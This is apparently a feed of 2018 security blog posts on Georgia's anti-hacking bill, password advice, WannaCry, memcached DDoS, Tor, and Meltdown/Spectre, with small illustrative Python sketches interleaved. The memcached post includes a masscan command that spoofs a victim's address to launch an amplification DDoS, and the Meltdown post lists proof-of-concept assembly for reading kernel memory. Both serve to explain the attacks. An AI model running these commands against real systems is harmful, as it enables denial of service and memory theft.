What's new around the Internet

| Src | Date (GMT) | Title | Description | Tags | Stories | Notes |

| 2018-04-16 07:42:52 | My letter urging Georgia governor to veto anti-hacking bill (direct link) | February 16, 2018. Office of the Governor, 206 Washington Street, 111 State Capitol, Atlanta, Georgia 30334. Re: SB 315. Dear Governor Deal: I am writing to urge you to veto SB315, the "Unauthorized Computer Access" bill. The cybersecurity community, of which Georgia is a leader, is nearly unanimous that SB315 will make cybersecurity worse. You've undoubtedly heard from many of us opposing this bill. It does not help in prosecuting foreign hackers who target Georgian computers, such as our elections systems. Instead, it prevents those who notice security flaws from pointing them out, thereby getting them fixed. This law violates the well-known Kerckhoffs's Principle, that security is achieved through transparency and openness rather than through secrecy and obscurity. That the bill contains this flaw is no accident. The justification for this bill comes from an incident where a security researcher noticed a Georgia state election system had made voter information public. This remained unfixed, months after the vulnerability was first disclosed, leaving the data exposed. Those in charge decided that it was better to prosecute those responsible for discovering the flaw rather than punish those who failed to secure Georgia voter information, hence this law. Too many security experts oppose this bill for it to go forward. Signing this bill, one that is weak on cybersecurity by favoring political cover-up over the consensus of the cybersecurity community, will be part of your legacy. I urge you instead to veto this bill, commanding the legislature to write a better one, this time consulting experts, which due to Georgia's thriving cybersecurity community, we do not lack. Thank you for your attention. Sincerely, Robert Graham, (formerly) Chief Scientist, Internet Security Systems | Guideline | |||

| 2018-04-15 21:57:11 | Let's stop talking about password strength (direct link) | [Picture from EFF, CC-BY license] Near the top of most security recommendations is to use "strong passwords". We need to stop doing this. Yes, weak passwords can be a problem. If a website gets hacked, weak passwords are easier to crack. It's not that this is wrong advice. On the other hand, it's not particularly good advice, either. It's far down the list of important advice that people need to remember. "Weak passwords" are nowhere near the risk of "password reuse". When your Facebook or email account gets hacked, it's because you used the same password across many websites, not because you used a weak password. Important websites, where the strength of your password matters, already take care of the problem. They use strong, salted hashes on the backend to protect the password. On the frontend, they force passwords to be a certain length and a certain complexity. Maybe the better advice is to not trust any website that doesn't enforce stronger passwords (minimum of 8 characters consisting of both letters and non-letters). To some extent, this "strong password" advice has become obsolete. A decade ago, websites had poor protection (MD5 hashes) and no enforcement of complexity, so it was up to the user to choose strong passwords. Now that important websites have changed their behavior, such as using bcrypt, there is less onus on the user. But the real issue here is that "strong password" advice reflects the evil, authoritarian impulses of the infosec community. Instead of measuring insecurity in terms of costs vs. benefits, risks vs. rewards, we insist that it's an issue of moral weakness. We pretend that flaws happen because people are greedy, lazy, and ignorant. We pretend that security is its own goal, a benefit we should achieve, rather than a cost we must endure. We like giving moral advice because it's easy: just be "stronger". Discussing "password reuse" is more complicated, forcing us to discuss password managers, writing down passwords on paper, that it's okay to reuse passwords for crappy websites you don't care about, and so on. What I'm trying to say is that the moral weakness here is us. Rather than give pertinent advice we give lazy advice. We give advice that victim-shames people for being weak while pretending that we are strong. So stop telling people to use strong passwords. It's crass advice on your part and largely unhelpful for your audience, distracting them from the more important things. |

||||
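
The two server-side practices the password post mentions (a length-and-complexity check on the frontend, a salted hash on the backend) can be sketched roughly as follows. This is only an illustration under stated assumptions: the post names bcrypt, which is not in Python's standard library, so the sketch swaps in `hashlib.scrypt` as a stand-in, and the function names and cost parameters are made up for the example rather than taken from the post.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple


def meets_policy(password: str) -> bool:
    """Policy quoted in the post: at least 8 characters, letters and non-letters."""
    has_letter = any(c.isalpha() for c in password)
    has_non_letter = any(not c.isalpha() for c in password)
    return len(password) >= 8 and has_letter and has_non_letter


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). scrypt stands in for bcrypt here (assumption)."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every stored password
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2**14, r=8, p=1)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)
```

Because each password gets its own salt, two users with the same password end up with different stored digests, which is what makes precomputed cracking tables far less useful against a leaked database.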

| 2018-04-01 22:59:06 | Why the crypto-backdoor side is morally corrupt (direct link) | Supporting crypto-backdoors for law enforcement is a reasonable position, but the side that argues for it adds things that are either outright lies or morally corrupt. Every year, the amount of digital evidence law enforcement has to solve crimes increases, yet they outrageously lie, claiming they are "going dark", losing access to evidence. A weirder claim is that those who oppose crypto-backdoors are nonetheless ethically required to make them work. This is morally corrupt. That's the point of this Lawfare post, which claims: "What I am saying is that those arguing that we should reject third-party access out of hand haven't carried their research burden. ... There are two reasons why I think there hasn't been enough research to establish the no-third-party access position. First, research in this area is “taboo” among security researchers. ... the second reason why I believe more research needs to be done: the fact that prominent non-government experts are publicly willing to try to build secure third-party-access solutions should make the information-security community question the consensus view." This is nonsense. It's like claiming we haven't cured the common cold because researchers haven't spent enough effort at it. When researchers claim they've tried 10,000 ways to make something work, it's like insisting they haven't done enough because they haven't tried 10,001 times. Certainly, half the community doesn't want to make such things work. Any solution for the "legitimate" law enforcement of the United States means a solution for illegitimate states like China and Russia which would use the feature to oppress their own people. Even if I believe it's a net benefit to the United States, I would never attempt such research because of China and Russia. But computer scientists notoriously ignore ethics in pursuit of developing technology. That describes the other half of the crypto community who would gladly work on the problem. The reason they haven't come up with solutions is that the problem is hard, really hard. The second reason the above argument is wrong: it says we should believe a solution is possible because some outsiders are willing to try. But as Yoda says, do or do not, there is no try. Our opinions on the difficulty of the problem don't change simply because people are trying. Our opinions change when people are succeeding. People are always trying the impossible; that's not evidence it's possible. The paper cherry-picks things, like Intel CPU features, to make it seem like they are making forward progress. No. Intel's SGX extensions are there for other reasons. Sure, it's a new development, and new developments may change our opinion on the feasibility of law enforcement backdoors. But nowhere in talking about this new development have they actually proposed a solution to the backdoor problem. New developments happen all the time, and the pro-backdoor side is going to seize upon each and every one to claim that this, finally, solves the backdoor problem, without showing exactly how it solves the problem. The Lawfare post does make one good argument, that there is no such thing as "absolute security", and thus the argument is stupid that "crypto-backdoors would be less than absolute security". Too often in the cybersecurity community we reject solutions that don't provide "absolute security" while failing to acknowledge that "absolute security" is impossible. But that's not really what's going on here. Cryptographers aren't certain we've achieved even "adequate security" with current crypto regimes like SSL/TLS/HTTPS. Every few years we find horrible flaws in the old versions and have to develop new versions. | ||||

| 2018-03-29 22:25:24 | WannaCry after one year (direct link) | In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago. It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this from watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, has whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry. Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit). Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it keeps spreading automatically after it is launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug an unpatched computer into the raw Internet, without the benefit of a firewall, it'll get infected within an hour. However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories implies some nefarious hacker activity that "targeted" Boeing, but that's unlikely. We now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop. Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed-up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading. Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will conti | Medical | Wannacry APT 38 | ||
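
The killswitch behaviour described in the WannaCry entry comes down to a single DNS lookup. A minimal sketch, assuming a placeholder domain (`killswitch.example` is hypothetical, not the real domain) and an injectable resolver so the logic can be exercised without touching the network; the two fake resolvers are illustrative stand-ins for a connected and an isolated network:

```python
import socket
from typing import Callable


def killswitch_tripped(domain: str,
                       resolve: Callable[[str], str] = socket.gethostbyname) -> bool:
    """Return True if the domain resolves, which is the worm's signal to stop."""
    try:
        resolve(domain)
        return True
    except OSError:  # socket.gaierror is a subclass of OSError
        return False


def connected_resolver(name: str) -> str:
    """Simulates a network where the lookup succeeds (illustrative only)."""
    return "192.0.2.1"  # address from the reserved documentation range


def isolated_resolver(name: str) -> str:
    """Simulates a network where outside DNS lookups fail (illustrative only)."""
    raise socket.gaierror("no resolver reachable")
```

With `isolated_resolver`, `killswitch_tripped("killswitch.example", isolated_resolver)` returns `False`, which mirrors the post's point: on a network cut off from Internet DNS the check never succeeds, so nothing tells the worm to stop.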

| 2018-03-12 05:46:00 | What John Oliver gets wrong about Bitcoin (direct link) | John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong. How Bitcoin works: Nowhere in the show does it describe what Bitcoin is and how it works. Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead. All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work. Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't. Sticking to Satoshi's original ideas is a lot better than trying to repeat how the crazy fringe activists define Bitcoin. How does any money have value? Oliver's answer is that currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000. This is wrong. A better way of asking the question is why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation": as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things. The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, through the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases supply, so that the dollar is worth less. The reason money follows the law of Supply and Demand is that people use money; they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It's not like a fine art painting, a stamp collection or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call |

Guideline | |||
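
To put the "roughly 2% each year" figure from the Bitcoin entry in perspective, here is a small worked calculation. It assumes prices rise by a constant 2% every year, which is a simplification for illustration; real inflation varies from year to year, and the function name is made up for the example.

```python
def purchasing_power(years: int, annual_inflation: float = 0.02) -> float:
    """Fraction of today's purchasing power that one dollar keeps after `years`.

    If prices grow by (1 + rate) each year, a dollar buys
    1 / (1 + rate) ** years as much as it does today.
    """
    return 1.0 / (1.0 + annual_inflation) ** years


# Print the remaining purchasing power at a few horizons.
for n in (1, 10, 35):
    print(f"after {n:2d} years: {purchasing_power(n):.3f}")
```

Under that assumption a dollar keeps about 82% of its purchasing power after a decade and loses roughly half of it after about 35 years.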

| 2018-03-08 06:57:20 | Some notes on memcached DDoS (direct link) | I thought I'd write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks. Test your servers: I added code to my port scanner for this, then scanned the Internet: `masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached` This example scans the entire Internet (/0). Replace 0.0.0.0/0 with your address range (or ranges). This produces output that looks like this: `Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13` `Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17` `Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13` `Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20` `Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20` `Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6` `Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13` The "banners" check filters out those with valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use 'cut' to grab just column 6: `... | cut -d ' ' -f 6 | cut -d: -f1` You often get multiple responses to just one query, so you'll want to sort/uniq the list: `... | sort | uniq` My results from an Internet-wide scan: I got 15181 results (or roughly 15,000). People are using Shodan to find a list of memcached servers. They might be getting a lot of results back that respond to TCP instead of UDP. Only UDP can be used for the attack. Masscan as exploit script: BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address. `masscan -iL amplifiers.txt -pU:11211 --spoof-ip --rate 100000` I point this out to show how there's no magic in exploiting this. Numerous exploit scripts have been released, because it's so easy. Why memcached servers are vulnerable: Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server. | Guideline | |||
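
The `cut`, `sort` and `uniq` filtering steps from the memcached entry can also be written as a short script, which is handy when auditing your own address ranges. A minimal sketch, assuming the banner lines have exactly the format shown in the sample output; the function name and the regular expression are illustrative, not part of masscan.

```python
import re
from typing import Iterable, List

# Matches lines such as:
#   Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=... version=1.4.20
BANNER_RE = re.compile(
    r"^Banner on port 11211/udp on (?P<ip>\d{1,3}(?:\.\d{1,3}){3}): \[memcached\]"
)


def unique_memcached_hosts(lines: Iterable[str]) -> List[str]:
    """Return de-duplicated IPs from banner lines, sorted as plain strings."""
    found = set()
    for line in lines:
        match = BANNER_RE.match(line.strip())
        if match:
            found.add(match.group("ip"))
    return sorted(found)


sample = [
    "Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13",
    "Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17",
    "Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13",
]
print(unique_memcached_hosts(sample))  # the repeated 172.246.132.226 line collapses to one entry
```

Matching on the `[memcached]` tag plays the same role as the `grep memcached` step, and the set takes care of hosts that answer a single probe more than once.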



| 2018-03-01 04:22:06 | AskRob: Does Tor let government peek at vuln info? (direct link) | On Twitter, somebody asked this question: "@ErrataRob comments?" (E. Harding🇸🇾, друг народа (anti-Russia=block), @Enopoletus, March 1, 2018). The question is about a blog post that claims Tor privately tips off the government about vulnerabilities, using as proof a "vulnerability" from October 2007 that wasn't made public until 2011. The tl;dr is that it's bunk. There was no vulnerability; it was a feature request. The details were already public. No spy agency was involved, only the agency that runs Voice of America and which tries to protect activists under foreign repressive regimes. Discussion: The issue is that Tor traffic looks like Tor traffic, making it easy to block/censor, or worse, identify users. Over the years, Tor has added features to make it look more and more like normal traffic, like the encrypted traffic used by Facebook, Google, and Apple. Tor improves this bit-by-bit over time, but short of actually piggybacking on website traffic, it will always leave some telltale signature. An example showing how we can distinguish Tor traffic is the packet below, from the latest version of the Tor server: Had this been Google or Facebook, the names would be something like "www.google.com" or "facebook.com". Or, had this been a normal "self-signed" certificate, the names would still be recognizable. But Tor creates randomized names, with letters and numbers, making it distinctive. It's hard to automate detection of this, because it's only probably Tor (other self-signed certificates look like this, too), which means you'll have occasional "false-positives". But still, if you compare this to the pattern of traffic, you can reliably detect that Tor is happening on your network. This has always been a known issue, since the earliest days. Google the search term "detect tor traffic", and set your advanced search dates to before 2007, and you'll see lots of discussion about this, such as this post for writing intrusion-detection signatures for Tor. Among the things you'll find is this presentation from 2006 where its creator (Roger Dingledine) talks about how Tor can be identified on the network with its unique network fingerprint. For a "vulnerability" they supposedly kept private until 2011, they were awfully darn public about it. |

||||
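
As a rough illustration of the detection idea in the Tor entry (certificate names made of random-looking letters and numbers), here is a minimal sketch. The length threshold, the rule itself, and the sample names are assumptions invented for this example rather than a real intrusion-detection signature, and, as the post notes, any check like this will produce occasional false positives.

```python
def looks_randomized(hostname: str, min_len: int = 8) -> bool:
    """Heuristic: the main label is long and mixes letters with digits.

    A hypothetical rule of thumb, not how any real IDS signature works.
    """
    labels = hostname.lower().split(".")
    # Ignore a leading "www"; the label just before the TLD is the one we test.
    if labels and labels[0] == "www":
        labels = labels[1:]
    if len(labels) < 2:
        return False
    label = labels[-2]
    has_letter = any(c.isalpha() for c in label)
    has_digit = any(c.isdigit() for c in label)
    return len(label) >= min_len and label.isalnum() and has_letter and has_digit


# The last name is a made-up example of a randomized certificate name.
for name in ("www.google.com", "facebook.com", "www.4xdpq7ilbwf3s.net"):
    print(name, looks_randomized(name))
```

A check this crude only yields a "probably"; the post's point is that it becomes reliable once combined with the overall pattern of traffic.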

| 2018-02-02 21:32:16 | Blame privacy activists for the Memo?? (direct link) | Former FBI agent Asha Rangappa @AshaRangappa_ has a smart post debunking the Nunes Memo, then takes it all back again with an op-ed in the NYTimes blaming us privacy activists. She presents an obviously false narrative that the FBI and FISA courts are above suspicion. I know from first-hand experience that the FBI is corrupt. In 2007, they threatened me, trying to get me to cancel a talk that revealed security vulnerabilities in a large corporation's product. Such abuses occur because there is no transparency and oversight. FBI agents write down our conversation in their little notebooks instead of recording it, so that they can control the narrative of what happened, presenting their version of the conversation (leaving out the threats). In this day and age of recording devices, this is indefensible. She writes "I know firsthand that it's difficult to get a FISA warrant". Yes, the process was difficult for her, an underling, to get a FISA warrant. The process is different when a leader tries to do the same thing. I know this first hand, having casually worked as an outsider with intelligence agencies. I saw two processes in place: one for the flunkies, and one for those above the system. The flunkies constantly complained about how there are too many processes in place oppressing them, preventing them from getting their jobs done. The leaders understood the system and how to sidestep those processes. That's not to say the Nunes Memo has merit, but it does point out that privacy advocates have a point in wanting more oversight and transparency in such surveillance of American citizens. Blaming us privacy advocates isn't the way to go. It's not going to succeed in tarnishing us, but will push us more into Trump's camp, causing us to reiterate that we believe the FBI and FISA are corrupt. | Guideline | |||

| 2018-01-29 01:25:14 | The problematic Wannacry North Korea attribution (direct link) | Last month, the US government officially "attributed" the Wannacry ransomware worm to North Korea. This attribution has three flaws, which are a good lesson for attribution in general. It was an accident: The most important fact about Wannacry is that it was an accident. We've had 30 years of experience with Internet worms teaching us that worms are always accidents. While launching worms may be intentional, their effects cannot be predicted. While they appear to have targets, like Slammer against South Korea, or Witty against the Pentagon, further analysis shows this was just a random effect that was impossible to predict ahead of time. Only in hindsight are these effects explainable. We should hold those causing accidents accountable, too, but it's a different accountability. The U.S. has caused more civilian deaths in its War on Terror than the terrorists caused triggering that war. But we hold these to be morally different: the terrorists targeted the innocent, whereas the U.S. takes great pains to avoid civilian casualties. Since we are talking about blaming those responsible for accidents, we also must include the NSA in that mix. The NSA created, then allowed the release of, weaponized exploits. That's like accidentally dropping a load of unexploded bombs near a village. When those bombs are then used, those having lost the weapons are held guilty along with those using them. Yes, while we should blame the hacker who added ETERNALBLUE to their ransomware, we should also blame the NSA for losing control of ETERNALBLUE. A country and its assets are different: Was it North Korea, or hackers affiliated with North Korea? These aren't the same. North Korea doesn't really have hackers of its own. It doesn't have citizens who grow up with computers to pick from. Moreover, an internal hacking corps would create tainted citizens exposed to dangerous outside ideas. Instead, North Korea develops external hacking "assets", supporting several external hacking groups in China, Japan, and South Korea. This is similar to how intelligence agencies develop human "assets" in foreign countries. While these assets do things for their handlers, they also have normal day jobs, and do many things that are wholly independent and even sometimes against their handler's interests. For example, this Muckrock FOIA dump shows how "CIA assets" independently worked for Castro and assassinated a Panamanian president. That they also worked for the CIA does not make the CIA responsible for the Panamanian assassination. That CIA/intelligence assets work this way is well-known and uncontroversial. The fact that countries use hacker assets like this is the controversial part. These hackers do act independently, yet we refuse to consider this when we want to "attribute" attacks. Attribution is political: We have far better attribution for the nPetya attacks. It was less accidental (they clearly desired to disrupt Ukraine), and the hackers were much closer to the Russian government (Russian citizens). Yet, the Trump administration isn't fighting Russia, they are fighting North Korea, so they don't officially attribute nPetya to Russia, but do attribute Wannacry to North Korea. Trump is in conflict with North Korea. He is looking for ways to escalate the conflict. Attributing Wannacry helps achieve his political objectives. That it was blatantly politics is demonstrated by the | Wannacry | |||

| 2018-01-22 19:55:09 | "Skyfall attack" was attention seeking (lien direct) | After the Meltdown/Spectre attacks, somebody created a website promising related "Skyfall/Solace" attacks. They revealed today that it was a "hoax".It was a bad hoax. It wasn't a clever troll, parody, or commentary. It was childish behavior seeking attention.For all you hate the naming of security vulnerabilities, Meltdown/Spectre was important enough to deserve a name. Sure, from an infosec perspective, it was minor, we just patch and move on. But from an operating-system and CPU design perspective, these things were huge.Page table isolation to fix Meltdown is a fundamental redesign of the operating system. What you learned in college about how Solaris, Windows, Linux, and BSD were designed is now out-of-date. It's on the same scale of change as address space randomization.The same is true of Spectre. It changes what capabilities are given to JavaScript (buffers and high resolution timers). It dramatically increases the paranoia we have of running untrusted code from the Internet. We've been cleansing JavaScript of things like buffer-overflows and type confusion errors, now we have to cleanse it of branch prediction issues.Moreover, not only do we need to change software, we need to change the CPU. No, we won't get rid of branch-prediction and out-of-order execution, but there are things that can easily be done to mitigate these attacks. We won't be recalling the billions of CPUs already shipped, and it will take a year before fixed CPUs appear on the market, but it's still an important change. That we fix security through such a massive hardware change is by itself worthy of "names".Yes, the "naming" of vulnerabilities is annoying. A bunch of vulns named by their creators have disappeared, and we've stopped talking about them. On the other hand, we still talk about Heartbleed and Shellshock, because they were damn important. A decade from now, we'll still be talking about Meltdown/Spectre. 
Even if they hadn't been named by their creators, we still would've come up with nicknames to talk about them, because CVE numbers are so inconvenient.Thus, the hoax's mocking of the naming is invalid. It was largely incoherent rambling from somebody who really doesn't understand the importance of these vulns, who uses the hoax to promote themselves. | ||||

| 2018-01-04 02:29:18 | Some notes on Meltdown/Spectre (lien direct) | I thought I'd write up some notes.You don't have to worry if you patch. If you download the latest update from Microsoft, Apple, or Linux, then the problem is fixed for you and you don't have to worry. If you aren't up to date, then there's a lot of other nasties out there you should probably also be worrying about. I mention this because while this bug is big in the news, it's probably not news the average consumer needs to concern themselves with.This will force a redesign of CPUs and operating systems. While not a big news item for consumers, it's huge in the geek world. We'll need to redesign operating systems and how CPUs are made.Don't worry about the performance hit. Some, especially avid gamers, are concerned about the claims of "30%" performance reduction when applying the patch. That's only in some rare cases, so you shouldn't worry too much about it. As far as I can tell, 3D games aren't likely to see more than 1% performance degradation. If you imagine your game is suddenly slower after the patch, then something else broke it.This wasn't foreseeable. A common cliche is that such bugs happen because people don't take security seriously, or that they are taking "shortcuts". That's not the case here. Speculative execution and timing issues with caches are inherent issues with CPU hardware. "Fixing" this would make CPUs run ten times slower. Thus, while we can tweak hardware going forward, the larger change will be in software.There's no good way to disclose this. The cybersecurity industry has a process for coordinating the release of such bugs, which appears to have broken down. In truth, it didn't. Once Linus announced a security patch that would degrade performance of the Linux kernel, we knew the coming bug was going to be Big. Looking at the Linux patch, tracking backwards to the bug was only a matter of time. 
Hence, the release of this information was a bit sooner than some wanted. This is to be expected, and is nothing to be upset about.It helps to have a name. Many are offended by the crassness of naming vulnerabilities and giving them logos. On the other hand, we are going to be talking about these bugs for the next decade. Having a recognizable name, rather than a hard-to-remember number, is useful.Should I stop buying Intel? Intel has the worst of the bugs here. On the other hand, ARM and AMD alternatives have their own problems. Many want to deploy ARM servers in their data centers, but these are likely to expose bugs you don't see on x86 servers. The software fix, "page table isolation", seems to work, so there might not be anything to worry about. On the other hand, holding up purchases because of "fear" of this bug is a good way to squeeze price reductions out of your vendor. Conversely, later generation CPUs, "Haswell" and even "Skylake" seem to have the least performance degradation, so it might be time to upgrade older servers to newer processors.Intel misleads. Intel has a press release that implies they are not impacted any worse than others. This is wrong: the "Meltdown" issue appears to apply only to Intel CPUs. I don't like such marketing crap, so I mention it. Statements from companies: Amazon AWS, ARM, AMD, Intel, Anders Fogh's negative result | Guideline | |||

| 2018-01-03 22:45:31 | Why Meltdown exists (lien direct) | So I thought I'd answer this question. I'm not a "chipmaker", but I've been optimizing low-level x86 assembly language for a couple of decades.I'd love a blogpost written from the perspective of a chipmaker - Why this issue exists. I'd never question their competency, but it seems like a violation of expectations in hindsight. Based on my very limited understanding of these issues.- SwiftOnSecurity (@SwiftOnSecurity) January 4, 2018The tl;dr version is this: the CPUs have no bug. The results are correct, it's just that the timing is different. CPU designers will never fix the general problem of undetermined timing.CPUs are deterministic in the results they produce. If you add 5+6, you always get 11 -- always. On the other hand, the amount of time they take is non-deterministic. Run a benchmark on your computer. Now run it again. The amount of time it took varies, for a lot of reasons.That CPUs take an unknown amount of time is an inherent problem in CPU design. Even if you do everything right, "interrupts" from clock timers and network cards will still cause undefined timing problems. Therefore, CPU designers have thrown the concept of "deterministic time" out the window.The biggest source of non-deterministic behavior is the high-speed memory cache on the chip. When a piece of data is in the cache, the CPU accesses it immediately. When it isn't, the CPU has to stop and wait for slow main memory. Other things happening in the system impact the cache, unexpectedly evicting recently used data for one purpose in favor of data for another purpose.Hackers love "non-deterministic", because while such things are unknowable in theory, they are often knowable in practice.That's the case of the granddaddy of all hacker exploits, the "buffer overflow". From the programmer's perspective, the bug will result in just the software crashing for undefinable reasons. 
From the hacker's perspective, they reverse engineer what's going on underneath, then carefully craft buffer contents so the program doesn't crash, but instead continues to run the code the hacker supplies within the buffer. Buffer overflows are undefined in theory, well-defined in practice.Hackers have already been exploiting these definable/undefinable timing problems with the cache for a long time. An example is cache timing attacks on AES. AES reads a matrix from memory as it encrypts things. By playing with the cache, evicting things, timing things, you can figure out the pattern of memory accesses, and hence the secret key.Such cache timing attacks have been around since the beginning, really, and it's simply an unsolvable problem. Instead, we have workarounds, such as changing our crypto algorithms to not depend upon cache, or better yet, implementing them directly in the CPU (such as the Intel AES specialized instructions).What's happened today with Meltdown is that incompletely executed instructions, which discard their results, do affect the cache. We can then recover those partial/temporary/discarded results by measuring the cache timing. This has been known for a while, but we couldn't figure out how to successfully exploit this, as this paper from Anders Fogh reports. Hackers fixed this, making it practically exploitable.As a CPU des | ||||
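
The "deterministic results, non-deterministic timing" point in the post above is easy to try for yourself. What follows is only a minimal sketch, not anything from the original post: the function names `add_many` and `timed_run` and the loop size are made up for illustration. It runs the same computation several times, records the result and the elapsed time of each run, and lets you compare the two.

```python
import time


def add_many(n):
    """Sum the integers 0..n-1; the result depends only on n."""
    total = 0
    for i in range(n):
        total += i
    return total


def timed_run(n):
    """Return (result, elapsed_seconds) for one run of add_many."""
    start = time.perf_counter()
    result = add_many(n)
    elapsed = time.perf_counter() - start
    return result, elapsed


# Same input, five runs: the results must match, the timings usually do not.
runs = [timed_run(200_000) for _ in range(5)]
results = [result for result, _ in runs]
timings = [elapsed for _, elapsed in runs]

for result, elapsed in runs:
    print(f"result={result} elapsed={elapsed:.6f}s")
```

On a typical machine the printed results are identical on every run while the elapsed times drift from run to run, for the reasons the post lists (caches, interrupts, other activity on the system).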

| 2018-01-03 18:10:19 | Let's see if I've got Meltdown right (lien direct) | I thought I'd write down the proof-of-concept to see if I got it right.So the Meltdown paper lists the following steps: `; flush cache` `; rcx = kernel address` `; rbx = probe array` `retry:` `mov al, byte [rcx]` `shl rax, 0xc` `jz retry` `mov rbx, qword [rbx + rax]` `; measure which of 256 cachelines were accessed` So the first step is to flush the cache, so that none of the 256 possible cache lines in our "probe array" are in the cache. There are many ways this can be done.Now pick a byte of secret kernel memory to read. Presumably, we'll just read all of memory, one byte at a time. The address of this byte is in rcx.Now execute the instruction: `mov al, byte [rcx]` This line of code will crash (raise an exception). That's because [rcx] points to secret kernel memory which we don't have permission to read. The value of the real al (the low-order byte of rax) will never actually change.But fear not! Intel is massively out-of-order. That means before the exception happens, it will provisionally and partially execute the following instructions. While Intel has only 16 visible registers, it actually has 100 real registers. It'll stick the result in a pseudo-rax register. Only at the end of the long execution chain, if nothing bad happens, will the pseudo-rax register become the visible rax register.But in the meantime, we can continue (with speculative execution) to operate on pseudo-rax. Right now it contains a byte, so we need to make it bigger so that instead of referencing which byte it can now reference which cache-line. (This instruction multiplies by 4096 instead of just 64, to prevent the prefetcher from loading multiple adjacent cache-lines). `shl rax, 0xc` Now we use pseudo-rax to provisionally load the indicated bytes. `mov rbx, qword [rbx + 